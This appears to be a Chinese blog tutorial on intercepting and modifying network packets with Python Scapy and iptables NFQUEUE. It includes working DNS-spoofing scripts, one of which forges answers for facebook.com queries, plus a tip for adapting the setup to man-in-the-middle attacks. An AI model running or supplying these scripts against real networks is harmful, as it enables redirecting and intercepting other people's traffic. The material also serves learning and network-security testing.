python使用Scapy + Nfqueue抓包并修改

2024-04-01 05:58

本文主要是介绍python使用Scapy + Nfqueue抓包并修改,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

背景1  Nfqueue

Nfqueue是iptables和ip6tables的target,这个target可以将数据包交给用户空间。比如,下面的一个iptables规则

iptables -A INPUT -j NFQUEUE --queue-num 0


那么在用户空间,可以使用libnetfilter_queue来连接到queue  0(默认)并且从内核获得该消息,然后,必须给出对这个数据包的裁决(Drop,Accept等等)

一般在iptables中的target有以下五种(ACCEPT,DROP,RETURN,QUEUE,other_chain,而NFQUEUE是QUEUE的扩展。相比于QUEUE,它可以由用户指定不同的queue number。

背景2  scapy


之前写过一篇博客Scapy基础学习
监听数据:

from scapy.all import *
def callback(pkt):if pkt.haslayer(TCP):print pkt.summary()print pkt.show()print pkt[TCP] 
sniff(filter=”port 80”, prn=callback, store=0, iface=’wlan0’)

注入数据

pkt=Ether()/IP(dst="new.ycombinator.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"
send(pkt)


一个dns_spoof示例:

from scapy.all import *
def dns_spoof(pkt):redirect_to = '192.168.115.110'if pkt.haslayer(DNSQR): # DNS question recordspoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))send(spoofed_pkt)print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)


Scapy + nfqueue 数据包拦截,修改和转发

1.先看一个简单的例子:
 

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)payload.set_verdict(nfqueue.ACCEPT)
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_NET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


2.再看如何修改数据包:

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if pkt.haslayer(DNSQR): # Beginning modificationspkt[IP].dst = '192.168.115.118'pkt[IP].len = len(str(pkt))pkt[UDP].len = len(str(pkt[UDP]))del pkt[IP].chksumpayload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


注:这里需要关注payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt)),这个是使用iptables和nfqueue来发送数据,也可以不使用set_verdict_modified()函数。在callbak里可以这样操作:


payload.set_verdict(NF_DROP) 
send(modified_packet) 

3.上一个完整的dns-sproof示例

import nfqueue
from scapy.all import *
import os
domain = 'facebook.com'
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if not pkt.haslayer(DNSQR):payload.set_verdict(nfqueue.NF_ACCEPT)else:if domain in pkt[DNS].qd.qname:spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIP))payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))print '[+] Sent spoofed packet for %s' % domain
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')sys.exit('losing...')
main()

如果是中间人攻击的话,iptables规则需要修改成os.system('iptables -t nat PREROUTING -p udp --dport 53 -j NFQUEUE')才会起作用。


相关资料:

https://blog.csdn.net/wang_walfred/article/details/50475912

http://security.maruhn.com/netfilter-hacking-howto/

http://www.grep.it/RMD/05-Netfilter.pdf

http://security.maruhn.com/iptables-tutorial/x9983.html

http://bbs.chinaunix.net/thread-1939832-1-1.html

http://bbs.chinaunix.net/thread-1960139-1-1.html

http://dac01.sakura.ne.jp/projects/firewall/iptips.html

http://sourcecodebrowser.com/nfqueue-bindings/0.1/nfq__common_8c.html

http://ytliu.info/blog/2013/03/29/netfilterxue-xi-bi-ji-(er-)/

http://stackoverflow.com/questions/27244736/wrong-tcp-checksum-calculation-by-scapy

这篇关于python使用Scapy + Nfqueue抓包并修改的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/866379

相关文章

Java Stream流与使用操作指南

《JavaStream流与使用操作指南》Stream不是数据结构,而是一种高级的数据处理工具,允许你以声明式的方式处理数据集合,类似于SQL语句操作数据库,本文给大家介绍JavaStream流与使用... 目录一、什么是stream流二、创建stream流1.单列集合创建stream流2.双列集合创建str

Python的Darts库实现时间序列预测

《Python的Darts库实现时间序列预测》Darts一个集统计、机器学习与深度学习模型于一体的Python时间序列预测库,本文主要介绍了Python的Darts库实现时间序列预测,感兴趣的可以了解... 目录目录一、什么是 Darts?二、安装与基本配置安装 Darts导入基础模块三、时间序列数据结构与

Python正则表达式匹配和替换的操作指南

《Python正则表达式匹配和替换的操作指南》正则表达式是处理文本的强大工具,Python通过re模块提供了完整的正则表达式功能,本文将通过代码示例详细介绍Python中的正则匹配和替换操作,需要的朋... 目录基础语法导入re模块基本元字符常用匹配方法1. re.match() - 从字符串开头匹配2.

Python使用FastAPI实现大文件分片上传与断点续传功能

《Python使用FastAPI实现大文件分片上传与断点续传功能》大文件直传常遇到超时、网络抖动失败、失败后只能重传的问题,分片上传+断点续传可以把大文件拆成若干小块逐个上传,并在中断后从已完成分片继... 目录一、接口设计二、服务端实现(FastAPI)2.1 运行环境2.2 目录结构建议2.3 serv

通过Docker容器部署Python环境的全流程

《通过Docker容器部署Python环境的全流程》在现代化开发流程中,Docker因其轻量化、环境隔离和跨平台一致性的特性,已成为部署Python应用的标准工具,本文将详细演示如何通过Docker容... 目录引言一、docker与python的协同优势二、核心步骤详解三、进阶配置技巧四、生产环境最佳实践

Python一次性将指定版本所有包上传PyPI镜像解决方案

《Python一次性将指定版本所有包上传PyPI镜像解决方案》本文主要介绍了一个安全、完整、可离线部署的解决方案,用于一次性准备指定Python版本的所有包,然后导出到内网环境,感兴趣的小伙伴可以跟随... 目录为什么需要这个方案完整解决方案1. 项目目录结构2. 创建智能下载脚本3. 创建包清单生成脚本4

Spring Security简介、使用与最佳实践

《SpringSecurity简介、使用与最佳实践》SpringSecurity是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架,本文给大家介绍SpringSec... 目录一、如何理解 Spring Security?—— 核心思想二、如何在 Java 项目中使用?——

springboot中使用okhttp3的小结

《springboot中使用okhttp3的小结》OkHttp3是一个JavaHTTP客户端,可以处理各种请求类型,比如GET、POST、PUT等,并且支持高效的HTTP连接池、请求和响应缓存、以及异... 在 Spring Boot 项目中使用 OkHttp3 进行 HTTP 请求是一个高效且流行的方式。

Python实现Excel批量样式修改器(附完整代码)

《Python实现Excel批量样式修改器(附完整代码)》这篇文章主要为大家详细介绍了如何使用Python实现一个Excel批量样式修改器,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一... 目录前言功能特性核心功能界面特性系统要求安装说明使用指南基本操作流程高级功能技术实现核心技术栈关键函

python获取指定名字的程序的文件路径的两种方法

《python获取指定名字的程序的文件路径的两种方法》本文主要介绍了python获取指定名字的程序的文件路径的两种方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要... 最近在做项目,需要用到给定一个程序名字就可以自动获取到这个程序在Windows系统下的绝对路径,以下